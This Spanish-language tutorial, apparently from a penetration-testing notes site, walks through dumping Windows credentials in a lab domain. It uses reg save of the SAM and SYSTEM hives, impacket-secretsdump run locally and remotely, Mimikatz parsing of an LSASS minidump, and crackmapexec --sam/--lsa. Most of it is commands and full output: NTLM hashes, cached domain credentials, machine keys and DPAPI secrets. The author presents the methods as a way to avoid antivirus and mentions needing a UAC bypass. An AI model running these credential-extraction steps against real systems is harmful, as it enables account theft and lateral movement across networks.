Volcado de Isass y SAM en Linux
La herramienta Mimikatz es detectado por casi todos los sistemas Windows aunque mas adelante veremos herramientas de evasion para esto, pero si lo queremos hacer de otra forma con una herramienta de linux podremos hacerlo de la siguiente forma:
Primero tendremos que extraer desde Windows la rama donde se encuentra la SAM creando un archivo, el cual luego nos pasaremos al kali.
cd .\Desktop
reg save hklm\sam sam.saveInfo:
La operación se completó correctamente.Esto nos dara un archivo llamado sam.save el cual nos tendremos que pasar al kali.
Pero a parte tambien volcaremos el system:
reg save hklm\system system.saveAhora nos copiaremos los 2 ficheros y los pasamos a nuestro kali.
Dentro de kali vamos a volcar la SAM desde el fichero que generamos sam.save de la siguiente forma:
impacket-secretsdump -sam sam.save -system system.save LOCALInfo:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0xc8125866b327df176940c9f2d6a48f5f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5ed544e71abe56b376b7993b21946520:::
santiago:1001:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
[*] Cleaning up...Y vemos que nos ha volcado todos los hashes de la SAM como vimos anteriormente en Windows de la misma forma y sin que salte el Antivirus.
Volcado de Isass
Ahora si queremos volcar la informacion de la isass pero para verlo en linux lo que podremos hacer es utilizar una herramienta que nos proporciona Microsoft para volcar esa informacion en un fichero como hemos estado haciendo anteriormente con el SAM.
URL = Download ProcDump
Antes de realizar todo esto, lo que vamos hacer es Crear un archivo de volcado de lsass, si nos vamos al Administrador de tareas -> Detalles -> buscamos el proceso lsass.exe -> click derecho y pinchar en Crear archivo de volcado.
Despues nos aparecera esto:
Y le daremos Abrir ubicación del archivo, por lo que veremos lo siguiente:
Y esto no salta Windows Defender ni ningun antivirus por alguna razon.
Ahora lo que vamos hacer es pasarnos este archivo a nuestra maquina kali.
Pero si nos volvemos a Windows lo podremos hacer en Windows con Mimikatz:
Estando en Mimikatz:
sekurlsa::minidump C:\Users\empleado1\Desktop\lsass.DMPInfo:
Switch to MINIDUMP : 'C:\Users\empleado1\Desktop\lsass.DMP'Ahora lo que haremos sera volcar el lsass del archivo este que le hemos especificado antes:
sekurlsa::logonPasswordsInfo:
Opening : 'C:\Users\empleado1\Desktop\lsass.DMP' file for minidump...
Authentication Id : 0 ; 3253663 (00000000:0031a59f)
Session : Interactive from 0
User Name : Administrator
Domain : CORP
Logon Server : DC01
Logon Time : 19/01/2025 9:52:13
SID : S-1-5-21-3352250647-938130414-2449934813-500
msv :
[00000003] Primary
* Username : Administrator
* Domain : CORP
* NTLM : a87f3a337d73085c45f9416be5787d86
* SHA1 : 34957e9ba3455a4a99d722b48693ac1123ba5dba
* DPAPI : b937fc9669fa922df0050d0d2f6d5de4
tspkg :
wdigest :
* Username : Administrator
* Domain : CORP
* Password : (null)
kerberos :
* Username : Administrator
* Domain : CORP.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
Authentication Id : 0 ; 2351163 (00000000:0023e03b)
Session : Interactive from 2
User Name : empleado1
Domain : CORP
Logon Server : DC01
Logon Time : 19/01/2025 9:39:14
SID : S-1-5-21-3352250647-938130414-2449934813-1104
msv :
[00000003] Primary
* Username : empleado1
* Domain : CORP
* NTLM : 1791df33b45987df23e4fe6c57ea6de7
* SHA1 : 6ef021db9a1924563f77a5d9ebf3e3629de98851
* DPAPI : a5798e4a9a06f32761063a2a093f0074
tspkg :
wdigest :
* Username : empleado1
* Domain : CORP
* Password : (null)
kerberos :
* Username : empleado1
* Domain : CORP.LOCAL
* Password : (null)
ssp :
credman :
cloudap :
.......................<RESTO_DEL_CODIGO>.......................................Y vemos que nos esta volcando la informacion, pero del fichero con mimikatz.
Ahora de forma remota lo que vamos hacer es volcar la informacion del lsass.DMP desde el kali hasta el Windows, es importante saber que tenemos que tener un usuario de dominio con privilegios de administrador locales para poder realizar esto.
Pero cuando hagamos esta tecnica, nos va a pedir la verificacion del UAC por lo que tendremos que realizar un UAC Bypass para que podamos obtener la informacion.
impacket-secretsdump empleado1:Passw0rd2@192.168.5.208Info:
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Service RemoteRegistry is in stopped state
[*] Service RemoteRegistry is disabled, enabling it
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xc8125866b327df176940c9f2d6a48f5f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5ed544e71abe56b376b7993b21946520:::
santiago:1001:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
[*] Dumping cached domain logon information (domain/username:hash)
CORP.LOCAL/empleado1:$DCC2$10240#empleado1#fda53d6158406f827388476bcbc97c37: (2025-01-19 08:39:14)
CORP.LOCAL/Administrator:$DCC2$10240#Administrator#e1c8d7e26653ae629a74772a389cf7e6: (2025-01-19 08:52:13)
CORP.LOCAL/annice.mable:$DCC2$10240#annice.mable#77702054bffe13f7c5bbe919a228d985: (2025-01-12 11:36:13)
CORP.LOCAL/angelika.shelly:$DCC2$10240#angelika.shelly#835512d4e4bb1d962c57d290eb99f670: (2025-01-12 16:51:40)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
CORP\WS01$:aes256-cts-hmac-sha1-96:9a9fc7447f8fa5521eeef5af175be7af2189392bc0d56f2e7d41e4c15cdad294
CORP\WS01$:aes128-cts-hmac-sha1-96:73670fc7a88720c24ff4c869dc84a9c1
CORP\WS01$:des-cbc-md5:8c5bea107cc8c804
CORP\WS01$:plain_password_hex:5700320055006b0049004e0027003d005e0055005c00750052004c0077006e004e00510045003c002d0066005d004b005f007600330072004400350022002700750068004e00300041003d0024006c004e0022005700750065006b00640034004a0056006f003e006c005f006c0050005c005d002700360077002c00290033005e005d004f005e005100560027002e003200380029004f0078005100410049002c003a0025005f00680072005d00380034002500490068002200640045006f0072005c0063002d0022005f002f006f0065006700720022005f0061006c00780047006400590062007700770059005f00
CORP\WS01$:aad3b435b51404eeaad3b435b51404ee:afc5c02d936d73808ce716070e883ab8:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0x6be6aee6bc489e7fab1ed9a63b1aa5c0d2f13fef
dpapi_userkey:0xb83f8122ee552579d8fbf4d9b304ae19ab5bb7af
[*] NL$KM
0000 5C B5 3B 8C D5 28 A0 C3 6A F2 57 A3 08 B6 F7 D4 \.;..(..j.W.....
0010 E4 7D 11 84 8F 2C 98 2B 2D DD 06 7D 30 53 B4 23 .}...,.+-..}0S.#
0020 4B 8D C7 7E 92 96 5B 48 67 29 99 50 C1 E4 27 A6 K..~..[Hg).P..'.
0030 37 2C 9D 99 E8 FD 57 11 CC 44 47 ED 30 6F 96 00 7,....W..DG.0o..
NL$KM:5cb53b8cd528a0c36af257a308b6f7d4e47d11848f2c982b2ddd067d3053b4234b8dc77e92965b4867299950c1e427a6372c9d99e8fd5711cc4447ed306f9600
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[*] Restoring the disabled state for service RemoteRegistryTambien podremos utilizar crackmapexec que por debajo estaria utilizando el mismo modulo de impacket de la siguiente forma:
crackmapexec smb 192.168.5.208 -u empleado1 -p "Passw0rd2" --samInfo:
[*] First time use detected
[*] Creating home directory structure
[*] Creating default workspace
[*] Initializing RDP protocol database
[*] Initializing MSSQL protocol database
[*] Initializing SSH protocol database
[*] Initializing WINRM protocol database
[*] Initializing FTP protocol database
[*] Initializing LDAP protocol database
[*] Initializing SMB protocol database
[*] Copying default configuration file
[*] Generating SSL certificate
SMB 192.168.5.208 445 WS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB 192.168.5.208 445 WS01 [+] corp.local\empleado1:Passw0rd2 (Pwn3d!)
SMB 192.168.5.208 445 WS01 [+] Dumping SAM hashes
SMB 192.168.5.208 445 WS01 Administrador:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.5.208 445 WS01 Invitado:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.5.208 445 WS01 DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SMB 192.168.5.208 445 WS01 WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:5ed544e71abe56b376b7993b21946520:::
SMB 192.168.5.208 445 WS01 santiago:1001:aad3b435b51404eeaad3b435b51404ee:7ce21f17c0aee7fb9ceba532d0546ad6:::
SMB 192.168.5.208 445 WS01 [+] Added 5 SAM hashes to the databasePodremos hacer lo de la misma forma pero con lsass:
crackmapexec smb 192.168.5.208 -u empleado1 -p "Passw0rd2" --lsaInfo:
SMB 192.168.5.208 445 WS01 [*] Windows 10 / Server 2019 Build 19041 x64 (name:WS01) (domain:corp.local) (signing:False) (SMBv1:False)
SMB 192.168.5.208 445 WS01 [+] corp.local\empleado1:Passw0rd2 (Pwn3d!)
SMB 192.168.5.208 445 WS01 [+] Dumping LSA secrets
SMB 192.168.5.208 445 WS01 CORP.LOCAL/empleado1:$DCC2$10240#empleado1#fda53d6158406f827388476bcbc97c37: (2025-01-19 08:39:14)
SMB 192.168.5.208 445 WS01 CORP.LOCAL/Administrator:$DCC2$10240#Administrator#e1c8d7e26653ae629a74772a389cf7e6: (2025-01-19 08:52:13)
SMB 192.168.5.208 445 WS01 CORP.LOCAL/annice.mable:$DCC2$10240#annice.mable#77702054bffe13f7c5bbe919a228d985: (2025-01-12 11:36:13)
SMB 192.168.5.208 445 WS01 CORP.LOCAL/angelika.shelly:$DCC2$10240#angelika.shelly#835512d4e4bb1d962c57d290eb99f670: (2025-01-12 16:51:40)
SMB 192.168.5.208 445 WS01 CORP\WS01$:aes256-cts-hmac-sha1-96:9a9fc7447f8fa5521eeef5af175be7af2189392bc0d56f2e7d41e4c15cdad294
SMB 192.168.5.208 445 WS01 CORP\WS01$:aes128-cts-hmac-sha1-96:73670fc7a88720c24ff4c869dc84a9c1
SMB 192.168.5.208 445 WS01 CORP\WS01$:des-cbc-md5:8c5bea107cc8c804
SMB 192.168.5.208 445 WS01 CORP\WS01$:plain_password_hex:5700320055006b0049004e0027003d005e0055005c00750052004c0077006e004e00510045003c002d0066005d004b005f007600330072004400350022002700750068004e00300041003d0024006c004e0022005700750065006b00640034004a0056006f003e006c005f006c0050005c005d002700360077002c00290033005e005d004f005e005100560027002e003200380029004f0078005100410049002c003a0025005f00680072005d00380034002500490068002200640045006f0072005c0063002d0022005f002f006f0065006700720022005f0061006c00780047006400590062007700770059005f00
SMB 192.168.5.208 445 WS01 CORP\WS01$:aad3b435b51404eeaad3b435b51404ee:afc5c02d936d73808ce716070e883ab8:::
SMB 192.168.5.208 445 WS01 dpapi_machinekey:0x6be6aee6bc489e7fab1ed9a63b1aa5c0d2f13fef
dpapi_userkey:0xb83f8122ee552579d8fbf4d9b304ae19ab5bb7af
SMB 192.168.5.208 445 WS01 NL$KM:5cb53b8cd528a0c36af257a308b6f7d4e47d11848f2c982b2ddd067d3053b4234b8dc77e92965b4867299950c1e427a6372c9d99e8fd5711cc4447ed306f9600
SMB 192.168.5.208 445 WS01 [+] Dumped 11 LSA secrets to /home/kali/.cme/logs/WS01_192.168.5.208_2025-01-19_051507.secrets and /home/kali/.cme/logs/WS01_192.168.5.208_2025-01-19_051507.cachedSi lo intentamos hacer con un usuario local con privilegios de administrador con este saltaria el UAC y nos nos dumpeara nada, pero con un usuario de dominio con privilegios de administrador local, por algun motivo no salta y si nos lo puede dumpear.
Last updated